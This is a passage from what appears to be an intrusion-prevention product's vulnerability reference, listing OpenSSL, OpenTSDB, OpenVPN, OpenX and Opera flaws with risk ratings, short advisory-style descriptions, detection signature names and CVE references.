http://www.securityfocus.com/bid/67900

OSVDB-107730
http://www.osvdb.org/107730

OpenSSL-ECDH-Use-After-Free

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-605-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A use-after-free vulnerability has been reported in OpenSSL. The vulnerability is due to an error in processing handshake messages arriving in incorrect order by ephemeral ECDH ciphersuites. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted TLS handshake sequence. A successful attack would result in the execution of arbitrary attacker code in the context of the affected application. If the attack fails, the application may terminate abnormally, resulting in a denial-of-service condition. Applications using OpenSSL may be affected by this vulnerability if the version of OpenSSL they use supports ephemeral ECDH ciphersuites and if these ciphersuites are enabled in the application configuration.

Situation:

HTTPS_CS-OpenSSL-ECDH-Use-After-Free

References:

CVE-2011-3210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3210

BID-49471
http://www.securityfocus.com/bid/49471

OSVDB-75230
http://www.osvdb.org/75230

OpenSSL-Elliptic-Curve-Binary-Polynomial-Field-Resource-Exhaustion

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-659-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Resource Starvation

Description:

A resource exhaustion vulnerability exists in OpenSSL. The vulnerability is due to a missing validity check of Elliptic Curve parameters within BN_GF2m_mod_inv(). A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted certificate to a vulnerable OpenSSL client or server application. Successful exploitation will cause the application to enter an infinite loop causing it to consume all CPU resources, resulting in a denial-of-service condition.

Situation:

HTTPS_CS-OpenSSL-Elliptic-Curve-Binary-Polynomial-Field-Resource-Exhaustion
HTTPS_SS-OpenSSL-Elliptic-Curve-Binary-Polynomial-Field-Resource-Exhaustion

References:

CVE-2015-1788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1788

OpenSSL-Email-Address-Variable-Length-Buffer-Overflow-CVE-2022-3786

About this vulnerability:

A buffer overflow vulnerability in OpenSSL

Risk:

High

First detected in:

sgpkg-ips-1521-5242

Last changed:

sgpkg-ips-1521-5242

Platform:

Generic

Software:

<os>

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in OpenSSL versions 3.0.0 to 3.0.6. An attacker can craft a malicious email address in a certificate to overflow an arbitrary number of bytes containing the '.' character (decimal 46) on the stack, resulting in a crash.

Situation:

TLS_CS-OpenSSL-X.509-Punycode-Email-Address-BOF
TLS_SS-OpenSSL-X.509-Punycode-Email-Address-BOF

References:

CVE-2022-3786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3786

OpenSSL-Get-Shared-Ciphers-Function-Off-By-One-Buffer-Overflow

About this vulnerability:

One byte buffer overflow vulnerability in OpenSSL SSL_get-shared-ciphers function

Risk:

Moderate

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Buffer Overflow

Description:

OpenSSL has an off-by-one error in the SSL_get_shared_ciphers function after the fix for the vulnerability CVE-2006-3738. The vulnerability can be triggered in the SSL handshake to overflow a buffer by one byte. A successful exploit may lead to arbitrary code execution or crash the affected server.

Situation:

HTTPS_CS-OpenSSL-Get-Shared-Ciphers-Function-Off-By-One-Buffer-Overflow

References:

CVE-2007-5135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5135

BID-25831
http://www.securityfocus.com/bid/25831

OpenSSL-Invalid-Pss-Parameters-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-640-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A denial of service vulnerability exists in OpenSSL. The vulnerability is due to a null pointer dereference when an OpenSSL application receives and processes a crafted certificate containing invalid RSA PSS parameters. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted client certificate to a vulnerable server application that requests it. Successful exploitation will cause the server application to crash, resulting in a denial-of-service condition.

Situation:

HTTPS_CS-OpenSSL-Invalid-Pss-Parameters-Denial-Of-Service

References:

CVE-2015-0208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0208

BID-73230
http://www.securityfocus.com/bid/73230

OpenSSL-Invalid-SRP-Parameter-Buffer-Overflow

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

Moderate

First detected in:

sgpkg-ips-602-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in OpenSSL. The vulnerability is due to an unjustified assumption on the size of a number when processing the A parameter used in SRP ciphersuites. A remote, unauthenticated attacker could exploit this vulnerability by sending specially crafted TLS messages to the target. Successful exploitation could lead to arbitrary code execution in context of the OpenSSL server application.

Situation:

HTTPS_CS-OpenSSL-Invalid-SRP-Parameter-A-Buffer-Overflow

References:

CVE-2014-3512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3512

BID-69083
http://www.securityfocus.com/bid/69083

OSVDB-109897
http://www.osvdb.org/109897

OpenSSL-Invalid-SRP-Parameters-G-And-B-Buffer-Overflow

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-602-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in OpenSSL. The vulnerability is due to an unjustified assumption on the size of numbers when processing the g and B parameters used in SRP ciphersuites. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user and sending specially crafted TLS messages to the target application. Successful exploitation could lead to arbitrary code execution in context of the OpenSSL client application.

Situation:

HTTPS_SS-OpenSSL-Invalid-SRP-Parameters-G-And-B-Buffer-Overflow

References:

CVE-2014-3512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3512

BID-69083
http://www.securityfocus.com/bid/69083

OSVDB-109897
http://www.osvdb.org/109897

OpenSSL-Large-Dh-Parameter-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL

Risk:

High

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Resource Starvation

Description:

A denial-of-service vulnerability has been reported in OpenSSL. The vulnerability is due to improper handling of an exceptionally large DH parameter when processing a Server Key Exchange. A remote attacker can exploit this vulnerability by running a malicious server which returns a DH parameter containing a large prime number. Successful exploitation will cause the OpenSSL client, which may be a server application, to use up high CPU resources in computing DH keys using the maliciously crafted DH prime, leading to resource exhaustion.

Situation:

HTTPS_SS-OpenSSL-Large-Dh-Parameter-Denial-Of-Service

References:

CVE-2018-0732
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0732

OpenSSL-Malformed-Client-Key-Buffer-Overflow

About this vulnerability:

Buffer overflow in OpenSSL.

Risk:

Critical

First detected in:

sgpkg-ips-11-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache; OpenSSL

Type:

Buffer Overflow

Description:

A flaw in OpenSSL can be exploited by sending a malformed client key. This allows executing arbitrary commands on the target host with the privileges of the vulnerable service. The vulnerability affects all applications that use the vulnerable library.

Situation:

HTTPS_CS-Apache-SSLv2-Malformed-Client-Key-BOF
HTTPS_CS-Apache-SSLv2-Malformed-Client-Key-BOF-BSD
HTTPS_CS-Apache-SSLv2-Malformed-Client-Key-Buffer-Overflow

References:

CVE-2002-0656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0656

BID-5363
http://www.securityfocus.com/bid/5363

OpenSSL-Null-Pointer-Dereference-CVE-2020-1971

About this vulnerability:

A vulnerability in OpenSSL

Risk:

Moderate

First detected in:

sgpkg-ips-1314-5242

Last changed:

sgpkg-ips-1314-5242

Platform:

Generic

Software:

OpenSSL

Type:

Input Validation

Description:

There is a null pointer dereference vulnerability in OpenSSL. The vulnerability can be triggered when two EDIPartyName elements are compared to each other. A successful exploit would cause OpenSSL to crash, resulting in a denial of service.

Situation:

HTTPS_SS-OpenSSL-Null-Pointer-Dereference-CVE-2020-1971

References:

CVE-2020-1971
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971

OpenSSL-Obj_obj2txt-Object-Identifier-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL

Risk:

High

First detected in:

sgpkg-ips-1611-5242

Last changed:

sgpkg-ips-1611-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A denial-of-service vulnerability has been reported in the OpenSSL library. The vulnerability is due to delays when processing ASN.1 OBJECT IDENTIFIERs. A remote attacker could exploit the vulnerability by sending crafted packets to an OpenSSL client, or a server that has explicitly enabled client authentication. Successful exploitation could result in denial of service conditions on the affected service.

Situation:

File-Binary_OpenSSL-Obj_obj2txt-Object-Identifier-Handling-Denial-Of-Service

References:

CVE-2023-2650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650

OpenSSL-RSA-To-EXPORT_RSA-Downgrade-Attack

About this vulnerability:

A vulnerability in OpenSSL

Risk:

High

First detected in:

sgpkg-ips-632-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

OpenSSL

Type:

Input Validation

Description:

There is a vulnerability in OpenSSL where the OpenSSL client will accept the use of an RSA temporary key in a non-export RSA key exchange ciphersuite. This allows a malicious server (MITM) to downgrade the security of a TLS connection and to possibly intercept all following communications. This vulnerability is also known as FREAK.

Situation:

TLS_Export-Ciphersuite

References:

CVE-2015-0204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204

OpenSSL-SM2-Decryption-sm2-Plaintext-Size-Miscalculation-Buffer-Overflow

About this vulnerability:

A vulnerability in OpenSSL.

Risk:

High

First detected in:

sgpkg-ips-1443-5242

Last changed:

sgpkg-ips-1443-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A vulnerability in the OpenSSL library, OpenSSL Project OpenSSL prior to 1.1.1l, which allows remote attackers to cause a denial of service condition by sending crafted packets to an application using OpenSSL API for SM2 decryption, due to miscalculation of the outlen parameter used by EVP_PKEY_decrypt when decrypting SM2 encrypted data.

Situation:

File-Text_OpenSSL-SM2-Decryption-sm2-Plaintext-Size-Miscalculation-Buffer-Overflow

References:

CVE-2021-3711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711

OpenSSL-SSL-Check-Chain-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in OpenSSL.

Risk:

High

First detected in:

sgpkg-ips-1373-5242

Last changed:

sgpkg-ips-1373-5242

Platform:

Generic

Software:

OpenSSL

Type:

Null Pointer Dereference

Description:

A vulnerability in OpenSSL, versions 1.1.1d, 1.1.1e, and 1.1.1f, which allows remote attackers to cause a denial of service condition by sending crafted packets containing invalid or unrecognized cert signature algorithm during TLS handshake, due to incorrect handling of the "signature_algorithms_cert" TLS extension by SSL_check_chain() during or after TLS handshake.

Situation:

TLS_CS-OpenSSL-SSL-Check-Chain-Null-Pointer-Dereference

References:

CVE-2020-1967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1967

OpenSSL-SSL3_al_warning-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-819-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Resource Starvation

Description:

There exists a denial of service vulnerability in OpenSSL. A remote attacker can accomplish this by repeatedly sending SSL Alert Warning records during the SSL handshake.

Situation:

HTTPS_CS-OpenSSL-SSL3_al_warning-Denial-Of-Service

References:

CVE-2016-8610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8610

OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A memory corruption vulnerability exists in OpenSSL library. The vulnerability is due to an error in ssl3_get_key_exchange function while handling server key exchange message. If a certificate structure contains a crafted value, the vulnerable code could cause a double-free error. Remote attackers could exploit this vulnerability by enticing the target user to connect to a malicious server using a vulnerable version of the OpenSSL library. Successful exploitation may allow for arbitrary code execution with the privileges of the application using the OpenSSL library.

Situation:

Generic_OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption
HTTPS_SS-OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption
TLS_SS-OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption

References:

CVE-2010-2939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2939

OpenSSL-TLS-AES-NI-DoS

About this vulnerability:

An OpenSSL TLS AES-NI DoS vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-765-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A vulnerability in OpenSSL, version 1.0.1c, which allows remote attackers to cause a denial of service condition, due to not properly computing the length of an encrypted message when used with a TLS version 1.1 or above.

Situation:

TLS_CS-OpenSSL-TLS-AES-NI-DoS

References:

CVE-2012-2686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2686

OpenSSL-TLS-Connection-Record-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in OpenSSL. The flaw is due to an error in the ssl3_get_record() function when handling TLS connections. A remote attacker can exploit this vulnerability by crafting certain records in TLS packets. Successful exploitation would result in the termination of the affected service due to a read attempt at NULL, which leads to a Denial of Service condition.

Situation:

TLS_Client-Syntax-Error

References:

CVE-2010-0740
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0740

OpenSSL-TLS-Heartbeat-Vulnerability

About this vulnerability:

A vulnerability in OpenSSL

Risk:

High

First detected in:

sgpkg-ips-574-5211

Last changed:

sgpkg-ips-1705-5242

Platform:

Generic

Software:

OpenSSL

Type:

Input Validation

Description:

There is a critical vulnerability in multiple versions of OpenSSL. A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.

Situation:

HTTPS_CS-TLS-Heartbeat-Request
HTTPS_SS-TLS-Heartbeat-Response
HTTPS_SS-TLS-Potential-Heartbeat-Response

References:

CVE-2014-0160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160

BID-66690
http://www.securityfocus.com/bid/66690

OSVDB-105465
http://www.osvdb.org/105465

OpenSSL-TLS-Record-Tampering-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-593-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

A denial of service vulnerability exists in OpenSSL. The vulnerability is due to an error in handling certain TLS records during the handshake process. A remote unauthenticated attacker could exploit this vulnerability by sending tampered records to a vulnerable SSL client (which could be a server application) during the handshake process. Successful exploitation could result in a NULL pointer dereference causing a denial of service condition.

Situation:

SMTP_SS-OpenSSL-TLS-Record-Tampering-Denial-Of-Service
HTTPS_SS-OpenSSL-TLS-Record-Tampering-Denial-Of-Service

References:

CVE-2013-4353
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4353

OSVDB-101843
http://www.osvdb.org/101843

OpenSSL-TLS-Server-Renegotiation-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in OpenSSL.

Risk:

High

First detected in:

sgpkg-ips-1371-5242

Last changed:

sgpkg-ips-1371-5242

Platform:

Generic

Software:

OpenSSL

Type:

Null Pointer Dereference

Description:

A vulnerability in OpenSSL, versions 1.1.1 prior to 1.1.1k, which allows remote attackers to cause a denial of service condition by sending crafted packets to an OpenSSL server, due to the improper handling of the renegotiation ClientHello message.

Situation:

HTTPS_CS-OpenSSL-TLS-Server-Renegotiation-Null-Pointer-Dereference

References:

CVE-2021-3449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449

OpenSSL-Tlsext_Type_status_request-Memory-Leak-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-819-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Resource Starvation

Description:

There exists a denial of service vulnerability in OpenSSL.

Situation:

HTTPS_CS-Large-Number-Of-Renegotiations-In-One-TLS-Connection

References:

CVE-2016-6304
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6304

OpenSSL-Tls_Get_Gessage_Body-Function-Init_Msg-Structure-Use-After-Free

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

Moderate

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in the tls_get_message_body function of OpenSSL. A remote, unauthenticated attacker can use this to execute arbitrary code under the security context of the application using the vulnerable version of OpenSSL.

Situation:

HTTPS_CS-OpenSSL-Tls_Get_Gessage_Body-Function-Init_Msg-Structure-Use-After-Free

References:

CVE-2016-6309
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6309

OpenSSL-X.509-Email-Address-4-Byte-Buffer-Overflow-CVE-2022-3602

About this vulnerability:

A buffer overflow vulnerability in OpenSSL

Risk:

High

First detected in:

sgpkg-ips-1521-5242

Last changed:

sgpkg-ips-1521-5242

Platform:

Generic

Software:

<os>

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in OpenSSL versions 3.0.0 to 3.0.6. An attacker can craft a malicious email address to overflow four attacker-controlled bytes on the stack, potentially resulting in a crash or, in rare cases, remote code execution.

Situation:

TLS_CS-OpenSSL-X.509-Punycode-Email-Address-BOF
TLS_SS-OpenSSL-X.509-Punycode-Email-Address-BOF

References:

CVE-2022-3602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3602

OpenSSL-X.509-IPAddressFamily-Extension-Parsing-Out-of-Bounds-Read

About this vulnerability:

An OpenSSL X.509 IPAddressFamily Extension Parsing Out-of-Bounds Read vulnerability

Risk:

High

First detected in:

sgpkg-ips-983-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

An out-of-bounds read vulnerability in OpenSSL, versions prior to 1.0.2l-git, which allows remote attackers to cause a denial of service condition by sending a crafted client or server certificate to the target.

Situation:

TLS_SS-OpenSSL-X.509-IPAddressFamily-Extension-Parsing-Out-of-Bounds-Read

References:

CVE-2017-3735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3735

OpenSSL-X509_cmp_Time-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenSSL Project OpenSSL

Risk:

High

First detected in:

sgpkg-ips-676-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Malfunction

Description:

There is a denial of service vulnerability in OpenSSL that is caused by an error in X509_cmp_time(). The vulnerability may be exploited by sending a crafted certificate to a vulnerable OpenSLL client or server.

Situation:

HTTPS_CS-OpenSSL-X509_cmp_Time-Denial-Of-Service
HTTPS_SS-OpenSSL-X509_cmp_Time-Denial-Of-Service

References:

CVE-2015-1789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1789

BID-75156
http://www.securityfocus.com/bid/75156

OpenTSDB-2.4.0-Unauthenticated-Command-Injection

About this vulnerability:

A vulnerability in OpenTSDB.

Risk:

High

First detected in:

sgpkg-ips-1552-5242

Last changed:

sgpkg-ips-1552-5242

Platform:

Unix; Linux

Software:

OpenTSDB

Type:

Input Validation

Description:

A vulnerability in OpenTSDB, versions 2.4.0 and before, which allows remote attackers to execute arbitrary system commands via the "yrange" parameter.

Situation:

HTTP_CRL-OpenTSDB-2.4.0-Unauthenticated-Command-Injection

References:

CVE-2020-35476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35476

OpenTSDB-2.4.1-Unauthenticated-Command-Injection-CVE-2023-25826

About this vulnerability:

An attempt to exploit a vulnerability in OpenTSDB detected

Risk:

High

First detected in:

sgpkg-ips-1828-5242

Last changed:

sgpkg-ips-1828-5242

Platform:

Linux

Software:

OpenTSDB

Type:

Input Validation

Description:

A vulnerability in OpenTSDB, versions 2.4.1 and before, which allows remote attackers to execute arbitrary commands through the "key" parameter, due to insufficient input validation.

Situation:

HTTP_CRL-OpenTSDB-2.4.1-Unauthenticated-Command-Injection

References:

CVE-2023-25826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25826

OpenTSDB-2.4.1-Unauthenticated-Command-Injection-CVE-2023-36812

About this vulnerability:

An attempt to exploit a vulnerability in OpenTSDB detected

Risk:

High

First detected in:

sgpkg-ips-1720-5242

Last changed:

sgpkg-ips-1828-5242

Platform:

Linux

Software:

OpenTSDB

Type:

Input Validation

Description:

A vulnerability in OpenTSDB, versions 2.4.1 and before, which allows remote attackers to execute arbitrary commands through the "key" parameter, due to insufficient input validation.

Situation:

HTTP_CRL-OpenTSDB-2.4.1-Unauthenticated-Command-Injection

References:

CVE-2023-36812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36812

OpenVAS-Web-Vulnerability-Scanner

About this vulnerability:	OpenVAS Vulnerability Scanner
Risk:	Moderate
First detected in:	sgpkg-ips-684-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Vulnerability Scanner
Description:	OpenVAS is a vulnerability scanner designed to verify whether known vulnerabilities are found in webservers.
Situation:	HTTP_CSH-OpenVAS-Scan-Detect-By-User-Agent

OpenVMPS-Syslog-Format-String

About this vulnerability:

OpenVMPS format string vulnerability in syslog calls

Risk:

Moderate

First detected in:

sgpkg-ips-61-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

OpenVMPS

Type:

Format String

Description:

OpenVMPS has a format string vulnerability that can be exploited for arbitrary remote code execution. A single crafted UDP package that contains format string specifiers can trigger the vulnerability.

Situation:

Generic_OpenVMPS-Syslog-Format-String

References:

CVE-2005-4714
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4714

BID-15072
http://www.securityfocus.com/bid/15072

OSVDB-19910
http://www.osvdb.org/19910

OpenVPN-P_Control-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenVPN Project OpenVPN

Risk:

High

First detected in:

sgpkg-ips-937-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenVPN

Type:

Malfunction

Description:

There exists a denial-of-service vulnerability in OpenVPN. A remote, unauthenticated attacker can trigger the vulnerability by sending a malicious packet, causing the server program to terminate.

Situation:

Generic_UDP-OpenVPN-P_Control-Denial-Of-Service
Datalength-UDP_OpenVPN-P_Control-Denial-Of-Service

References:

CVE-2017-7478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7478

OpenVPN-Read_Key-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in OpenVPN

Risk:

Moderate

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenVPN

Type:

Buffer Overflow

Description:

There exists a stack-based buffer overflow vulnerability in OpenVPN. A remote, unauthenticated attacker can use this to execute arbitrary code in the security context of ROOT or SYSTEM.

Situation:

Generic_UDP-OpenVPN-Read_Key-Stack-Based-Buffer-Overflow

References:

CVE-2017-12166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12166

OpenVPN-Server-And-Client-Mss_fixup_IPv6-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenVPN Project OpenVPN

Risk:

Moderate

First detected in:

sgpkg-ips-1009-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenVPN

Type:

Malfunction

Description:

Improper handling of a malformed TCP header in the tunneled traffic causes an assertion failure in OpenVPN. A successful exploit allows a remote attacker to cause a denial of service condition on the receiving endpoint.

Situation:

Generic_UDP-OpenVPN-Server-And-Client-Mss_fixup_IPv6-Denial-Of-Service

References:

CVE-2017-7508
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7508

Openwsman-HTTP-Basic-Authentication-Buffer-Overflow

About this vulnerability:

A vulnerability in Openwsman and VMware

Risk:

High

First detected in:

sgpkg-ips-171-2032

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

Openwsman; EMC VMware ESX Server; EMC VMware ESXi Server

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Openwsman, which is included in VMware ESX and EXi Server products. The flaw is due to improper processing of the HTTP basic authentication header. Remote attackers could exploit this vulnerability by sending HTTP requests with specially crafted header value. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the security context of the current server process.

Situation:

HTTP_CSH-Basic-Authentication-Header-Buffer-Overflow

References:

CVE-2008-2234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2234

BID-30694
http://www.securityfocus.com/bid/30694

OpenX-File-Upload-PHP-Code-Execution

About this vulnerability:

An OpenX File Upload PHP Code Execution vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-723-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenX

Type:

Input Validation

Description:

A vulnerability in OpenX, versions 2.8.1 and before, which allows remote attackers to upload and execute arbitrary PHP files through banner-edit.php.

Situation:

HTTP_CS-OpenX-File-Upload-PHP-Code-Execution

References:

CVE-2009-4098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4098

BID-37110
http://www.securityfocus.com/bid/37110

OSVDB-60499
http://www.osvdb.org/60499

OpenX-Flowplayer-Backdoor-Remote-Code-Execution

About this vulnerability:

OpenX Flowplayer Backdoor Remote Code Execution Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-570-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenX

Type:

Backdoor

Description:

There is a backdoor in OpenX Ad Server 2.8.10 allowing execution of arbitrary code in target server.

Situation:

HTTP_CRL-OpenX-Flowplayer-Backdoor-Remote-Code-Execution

References:

CVE-2013-4211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4211

OSVDB-96073
http://www.osvdb.org/96073

Opera-Browser-Content-Length-Buffer-Overflow

About this vulnerability:	A vulnerability in Opera Opera Browser
Risk:	Moderate
First detected in:	sgpkg-ips-413-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Opera
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability exists in Opera Browser. The vulnerability is due to a boundary error in the way the browser processes HTTP server replies. Remote attackers could exploit this vulnerability by persuading a target user to connect to an attacker-controlled HTTP server with a vulnerable version of Opera. This vulnerability can be exploited by remote attackers to execute arbitrary code on the target machine. In attack scenarios where code execution is successful, the behaviour of the target machine would depend on the intention of the injected code, which would run within the security context of the logged in user.
Situation:	HTTP_Reply-Content-Type-Missing HTTP_Reply-Content-Length-Unparseable HTTP_SHS-Suspiciously-Long-Reply-Content-Length-Header

Opera-Browser-Document-Writing-Uninitialized-Memory-Access

About this vulnerability:	A vulnerability in Opera Software Opera
Risk:	Moderate
First detected in:	sgpkg-ips-415-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Opera
Type:	Malfunction
Description:	An uninitialized memory access vulnerability exists in Opera web browser. The vulnerability is due to an error while handling asynchronous modifications to an HTML document. A remote attacker can exploit this issue by enticing a target user to open a specifically crafted web page. Successful exploitation could result in execution of arbitrary code within the security context of the currently logged on user. An unsuccessful exploit attempt may abnormally terminate the affected application.
Situation:	File-Text_Opera-Browser-Document-Writing-Uninitialized-Memory-Access

Opera-Browser-File-URI-Handling-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Opera web browser

Risk:

High

First detected in:

sgpkg-ips-186-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Opera

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Opera web browser. The browser has a boundary error when handling excessively long Universal Resource Indicator (URI) strings using a file protocol handler. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious HTML document. Successful attack may allow for arbitrary code injection and execution with privileges of the currently logged on user.

Situation:

HTTP_SS-Opera-Browser-File-URI-Handling-Buffer-Overflow
File-Text_Opera-Browser-File-URI-Handling-Buffer-Overflow

References:

BID-32323
http://www.securityfocus.com/bid/32323

Opera-History-Search-Cross-Site-Scripting

About this vulnerability:

An Opera History Search Cross-Site Scripting vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-764-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Opera

Type:

Cross-site Scripting

Description:

A vulnerability in Opera, versions before 9.61, which allows remote attackers to inject arbitrary web scripts or HTML via the History Search database.

Situation:

File-Text_Opera-History-Search-Cross-Site-Scripting

References:

CVE-2008-4696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4696

BID-31869
http://www.securityfocus.com/bid/31869

OSVDB-49472
http://www.osvdb.org/49472

Opera-Preferences-Modification

About this vulnerability:	A script can alter Opera preferences in certain coditions
Risk:	High
First detected in:	sgpkg-ips-136-2032
